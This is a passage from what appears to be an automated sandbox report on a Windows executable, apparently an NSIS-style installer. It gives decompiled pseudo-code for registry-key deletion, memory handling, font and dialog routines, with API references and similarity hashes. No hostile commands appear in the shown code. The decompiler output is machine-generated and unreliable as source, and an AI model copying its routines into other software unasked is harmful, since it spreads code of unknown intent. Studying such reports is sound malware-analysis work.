				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 6FC51837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E6FC51837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x6fc5405c = _a8;
				_t77 = 0;
				 *0x6fc54060 = _a16;
				_v12 = 0;
				_v8 = E6FC5123B();
				_t90 = E6FC512FE(_t42);
				_t87 = _t85;
				_t81 = E6FC5123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E6FC5123B();
					_t77 = E6FC512FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E6FC51429(_t85, _t90, _t87,  &_v52);
								E6FC51266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E6FC52EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E6FC52F10(_t59, _t83, _t85);
						} else {
							_t48 = E6FC52F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E6FC52D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E6FC52E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E6FC52D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x6fc51837
0x6fc51841
0x6fc5184a
0x6fc5184d
0x6fc51852
0x6fc5185b
0x6fc51864
0x6fc51866
0x6fc5186d
0x6fc5186f
0x6fc51872
0x6fc51876
0x6fc51882
0x6fc5188b
0x6fc51890
0x6fc51893
0x6fc51899
0x6fc51899
0x6fc5189c
0x6fc5189f
0x6fc518a2
0x6fc51968
0x6fc51968
0x6fc5196b
0x6fc519e5
0x6fc519e9
0x6fc519f8
0x6fc519fb
0x6fc51a03
0x6fc51a03
0x6fc51a03
0x6fc51a05
0x6fc51a05
0x6fc51a06
0x6fc51a06
0x6fc51a08
0x6fc51a0a
0x6fc51a10
0x6fc51a19
0x6fc51a2a
0x6fc51a35
0x6fc51a35
0x6fc519fd
0x6fc519e0
0x6fc519e0
0x6fc519e2
0x6fc519e2
0x00000000
0x6fc519e2
0x6fc519ff
0x6fc51a01
0x00000000
0x00000000
0x00000000
0x6fc51a01
0x6fc519ed
0x6fc519f1
0x00000000
0x6fc519f1
0x6fc5196d
0x6fc5196d
0x6fc5196e
0x6fc519d7
0x6fc519d9
0x00000000
0x00000000
0x6fc519db
0x6fc519de
0x00000000
0x00000000
0x00000000
0x6fc519de
0x6fc51970
0x6fc51970
0x6fc51971
0x6fc519aa
0x6fc519ae
0x6fc519ca
0x6fc519cd
0x00000000
0x00000000
0x6fc519cf
0x00000000
0x00000000
0x6fc519d1
0x6fc519d3
0x00000000
0x00000000
0x00000000
0x6fc519d5
0x6fc519b0
0x6fc519b4
0x6fc519b6
0x6fc519b8
0x6fc519ba
0x6fc519c3
0x6fc519bc
0x6fc519bc
0x6fc519bc
0x00000000
0x6fc519ba
0x6fc51973
0x6fc51973
0x6fc51976
0x6fc519a3
0x6fc519a5
0x00000000
0x6fc519a5
0x6fc51978
0x6fc51978
0x6fc5197b
0x6fc5198b
0x6fc5198f
0x6fc5199c
0x6fc5199e
0x00000000
0x6fc5199e
0x6fc51991
0x6fc51993
0x00000000
0x00000000
0x6fc51995
0x6fc51998
0x00000000
0x00000000
0x00000000
0x6fc5199a
0x6fc5197e
0x6fc5197f
0x6fc51985
0x6fc51987
0x6fc51987
0x00000000
0x6fc5197f
0x6fc518a8
0x6fc51920
0x6fc51922
0x6fc51925
0x6fc51943
0x6fc51946
0x6fc5194c
0x6fc51951
0x6fc51927
0x6fc51927
0x6fc5192b
0x6fc5192f
0x6fc51931
0x6fc51931
0x6fc51954
0x6fc51957
0x00000000
0x6fc5195d
0x6fc5195d
0x6fc51960
0x00000000
0x6fc51960
0x6fc51957
0x6fc518aa
0x6fc518ad
0x6fc51911
0x6fc51913
0x6fc51915
0x00000000
0x00000000
0x00000000
0x6fc5191b
0x6fc518af
0x6fc518b2
0x00000000
0x00000000
0x6fc518b4
0x6fc518b5
0x6fc518eb
0x6fc518ef
0x6fc51907
0x6fc51909
0x00000000
0x6fc51909
0x6fc518f1
0x6fc518f3
0x00000000
0x00000000
0x6fc518f9
0x6fc518fc
0x00000000
0x00000000
0x00000000
0x6fc51902
0x6fc518b7
0x6fc518ba
0x6fc518e1
0x00000000
0x6fc518bc
0x6fc518bc
0x6fc518bd
0x6fc518d1
0x6fc518d3
0x6fc518bf
0x6fc518c1
0x6fc518c7
0x6fc518c9
0x6fc518c9
0x6fc518c1
0x00000000
0x6fc518bd

APIs

GlobalFree.KERNEL32 ref: 6FC51893
GlobalFree.KERNEL32 ref: 6FC51A2A
GlobalFree.KERNEL32 ref: 6FC51A2F

Memory Dump Source

Source File: 00000000.00000002.667341894.000000006FC51000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: true

Associated: 00000000.00000002.667322660.000000006FC50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667363580.000000006FC53000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667372496.000000006FC55000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 7bd6a5a66503f709fb4bfba10c3912edefe8710d39c4450fcdd4574ef69d33de
Instruction ID: 7cf0ce688ff7386a9f903689914e8858587a1a05c47eb1dbc983a044fd3ff7ce
Opcode Fuzzy Hash: 7bd6a5a66503f709fb4bfba10c3912edefe8710d39c4450fcdd4574ef69d33de
Instruction Fuzzy Hash: E8511332D04298AEDB128FFDC98C9AEBBB5BF42359F04025BD400A7140F331BA758769

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32 ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}

0x00404b20
0x00404b25
0x00404b2d
0x00404b2e
0x00404b3b
0x00404b43
0x00404b44
0x00404b46
0x00404b48
0x00404b4a
0x00404b4d
0x00404b4d
0x00404b54
0x00404b5a
0x00404b5a
0x00404b61
0x00404b68
0x00404b6b
0x00404b6e
0x00404b6e
0x00404b72
0x00404b82
0x00404b84
0x00404b87
0x00404b30
0x00404b30
0x00404b37
0x00404b37
0x00404b8f
0x00404b9a
0x00404bb0
0x00404bc0
0x00404bdc

APIs

lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
wsprintfA.USER32 ref: 00404BC0
SetDlgItemTextA.USER32 ref: 00404BD3

Strings

%u.%u%s%s, xrefs: 00404BA2

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

